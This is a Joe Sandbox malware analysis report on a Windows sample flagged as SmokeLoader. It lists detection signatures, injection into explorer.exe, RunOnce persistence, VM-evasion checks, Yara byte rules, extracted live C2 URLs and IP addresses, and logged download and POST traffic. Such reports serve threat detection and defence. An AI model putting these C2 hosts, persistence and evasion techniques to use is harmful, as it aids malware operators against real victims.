Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cOm0MmeV34.exe

Overview

General Information

Sample name:cOm0MmeV34.exe
renamed because original name is a hash value
Original sample name:b31900ffd17c8b2ecfaa9b7b6f4cdca3.exe
Analysis ID:1476782
MD5:b31900ffd17c8b2ecfaa9b7b6f4cdca3
SHA1:c53316dad42a3aceb3154353791d0f0ae1fd819e
SHA256:3cc5509318b88990ff3c137b65e94cfe0cc6759a16180c849584b0345b345ef1
Tags:32exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cOm0MmeV34.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\cOm0MmeV34.exe" MD5: B31900FFD17C8B2ECFAA9B7B6F4CDCA3)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 5587.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\5587.exe MD5: 606F1EF4B610D9D6869EE7158CCA9D7A)
        • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 5587.exe (PID: 1284 cmdline: "C:\Users\user\AppData\Local\Temp\5587.exe" MD5: 606F1EF4B610D9D6869EE7158CCA9D7A)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 5587.exe (PID: 6680 cmdline: "C:\Users\user\AppData\Local\Temp\5587.exe" MD5: 606F1EF4B610D9D6869EE7158CCA9D7A)
        • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • tcgcuca (PID: 3792 cmdline: C:\Users\user\AppData\Roaming\tcgcuca MD5: B31900FFD17C8B2ECFAA9B7B6F4CDCA3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x7108:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    Click to see the 7 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: New RUN Key Pointing to Suspicious Folder
    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\5587.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#0428_8yUscnjrUY
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\5587.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#0428_8yUscnjrUY
    Sigma detected: Execution of Suspicious File Type Extension
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\tcgcuca, CommandLine: C:\Users\user\AppData\Roaming\tcgcuca, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tcgcuca, NewProcessName: C:\Users\user\AppData\Roaming\tcgcuca, OriginalFileName: C:\Users\user\AppData\Roaming\tcgcuca, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\tcgcuca, ProcessId: 3792, ProcessName: tcgcuca

    Snort Signatures

    Timestamp:07/19/24-13:44:06.953923
    SID:2019714
    Source Port:57789
    Destination Port:80
    Protocol:TCP
    Classtype:Potentially Bad Traffic

    Suricata Signatures

    Timestamp:2024-07-19T13:44:07.550988+0200
    SID:2019714
    Source Port:57789
    Destination Port:80
    Protocol:TCP
    Classtype:Potentially Bad Traffic

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://gebeus.ru/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://evilos.cc/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://cx5519.com/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://office-techs.biz/tmp/index.phpAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Roaming\tcgcucaReversingLabs: Detection: 34%
    Multi AV Scanner detection for submitted file
    Source: cOm0MmeV34.exeReversingLabs: Detection: 34%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\5587.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\tcgcucaJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: cOm0MmeV34.exeJoe Sandbox ML: detected
    Source: 5587.exe, 00000007.00000003.2820126770.0000023B26311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_1d0f3c01-d
    Source: cOm0MmeV34.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57793 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57795 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57798 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57799 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57800 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57801 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57802 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57804 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57805 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57808 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57809 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57810 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57811 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57812 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57814 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57815 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57816 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57817 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57820 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57821 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57822 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57823 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57825 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57828 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57829 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57830 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57833 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57834 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57836 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57839 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57840 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57841 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57844 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57847 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57848 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57849 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57851 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57852 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57857 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57859 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57861 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57863 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57864 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57865 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57867 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57868 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57869 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57871 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57872 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57873 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57875 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57876 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57877 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57879 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57880 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57881 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57883 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57885 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57887 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57888 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57889 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57891 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57895 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57896 version: TLS 1.2

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:57789 -> 64.190.113.113:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 186.145.236.93 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: http://evilos.cc/tmp/index.php
    Source: Malware configuration extractorURLs: http://gebeus.ru/tmp/index.php
    Source: Malware configuration extractorURLs: http://office-techs.biz/tmp/index.php
    Source: Malware configuration extractorURLs: http://cx5519.com/tmp/index.php
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 19 Jul 2024 11:44:07 GMTServer: ApacheLast-Modified: Thu, 18 Jul 2024 14:51:48 GMTETag: "f2000-61d86b7e62d3c"Accept-Ranges: bytesContent-Length: 991232Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 5b 24 32 21 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 da 08 00 00 4c 06 00 00 00 00 00 10 57 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 48 1f 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 e0 08 00 00 10 00 00 00 da 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 40 06 00 00 f0 08 00 00 3c 06 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 30 0f 00 00 02 00 00 00 1a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 60 0f 00 00 02 00 00 00 1c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 70 0f 00 00 02 00 00 00 1e 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: Joe Sandbox ViewIP Address: 77.221.157.163 77.221.157.163
    Source: Joe Sandbox ViewIP Address: 107.173.160.139 107.173.160.139
    Source: Joe Sandbox ViewIP Address: 107.173.160.137 107.173.160.137
    Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewJA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7591
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 156303
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
